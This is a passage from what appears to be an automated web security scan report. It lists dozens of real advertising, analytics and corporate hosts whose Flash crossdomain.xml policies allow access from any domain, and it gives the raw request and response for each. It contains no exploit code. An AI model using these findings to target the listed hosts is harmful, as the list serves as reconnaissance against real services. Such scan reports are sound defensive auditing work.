Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 12:46:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.31. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:55:56 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.32. http://int.teracent.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: int.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310681767000"
Last-Modified: Thu, 14 Jul 2011 22:16:07 GMT
Content-Type: application/xml
Content-Length: 373
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.33. http://integrate.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.34. http://l.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:08:15 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 12:08:15 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 1294
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.35. http://landing.optionshouse.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: landing.optionshouse.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 00:28:46 GMT
Accept-Ranges: bytes
ETag: "0734ba92a40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:15 GMT
Connection: close
Content-Length: 101

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.36. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:26 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.37. http://metrics.scottrade.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.scottrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.scottrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:47 GMT
Server: Omniture DC/2.0.0
xserver: www39
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.38. http://metrics.vonage.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Omniture DC/2.0.0
xserver: www10
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.39. http://pixel.everesttech.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "c68005-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=997452
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.40. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

3.41. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.42. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:29 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 06 Sep 2011 12:45:29 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.43. http://presence.apizone.betaregion.oberon-media.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://presence.apizone.betaregion.oberon-media.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: presence.apizone.betaregion.oberon-media.com

Response

HTTP/1.0 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Thu, 15 Mar 2007 15:40:00 GMT
Accept-Ranges: bytes
ETag: "0c8dc301867c71:8f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:46:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

3.44. http://query.yahooapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 12:45:27 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.45. http://r.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 11:59:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.46. http://redirect.rtrk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: redirect.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=84
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:57 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.47. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 23:53:42 GMT
Expires: Sat, 03 Sep 2011 23:42:21 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 45371
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.48. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:24 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.49. http://sensor2.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT
ETag: "1f00e1-c9-49c927e105340"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.50. http://serviceo.comcast.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serviceo.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: serviceo.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:41 GMT
Server: Omniture DC/2.0.0
xserver: www380
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.51. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sat, 10 Sep 2011 00:34:44 GMT
Date: Tue, 06 Sep 2011 12:45:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.52. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.53. http://t.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.54. http://t.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:56f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:49:34 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.55. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.56. http://utdi.reachlocal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: utdi.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=87
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.57. http://utdi.reachlocal.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: utdi.reachlocal.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
Last-Modified: Sat, 09 May 2009 00:14:34 GMT
ETag: "cc-4696fa1390e80"
Accept-Ranges: bytes
Content-Length: 204
Keep-Alive: timeout=12, max=91
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.58. http://whitefence.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: whitefence.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Omniture DC/2.0.0
xserver: www186
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.59. http://www.burstnet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 30 Aug 2011 18:10:17 GMT
ETag: "596a1b-66-4e5d2789"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.60. http://www.myfitv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myfitv.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:29:51 GMT
ETag: "90edc-c6-4a32088aa8480"
Last-Modified: Fri, 13 May 2011 04:13:54 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Content-Length: 198
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.61. http://www.zillow.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 12:45:19 GMT
ETag: W/"294-1314817478000"
Last-Modified: Wed, 31 Aug 2011 19:04:38 GMT
Content-Type: text/xml
Content-Length: 294
Via: 1.0 www.zillow.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=15, max=451
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.62. http://www2.whitefence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.whitefence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

